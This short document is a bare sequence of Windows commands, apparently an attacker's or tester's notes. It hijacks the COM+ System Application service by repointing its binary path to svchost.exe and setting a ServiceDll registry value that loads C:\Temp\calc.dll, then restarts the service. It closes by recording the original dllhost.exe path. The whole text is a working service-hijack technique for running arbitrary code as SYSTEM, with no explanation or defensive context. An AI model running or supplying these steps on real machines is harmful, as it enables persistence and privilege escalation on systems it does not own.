

sc stop COMSysApp


sc config COMSysApp binpath= "%windir%\System32\svchost.exe -k COMSysApp"


reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f


reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Temp\calc.dll" /f


sc start COMSysApp

------------------------------------------------------------------------

binpath original: C:\WINDOWS\system32\dllhost.exe


C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}



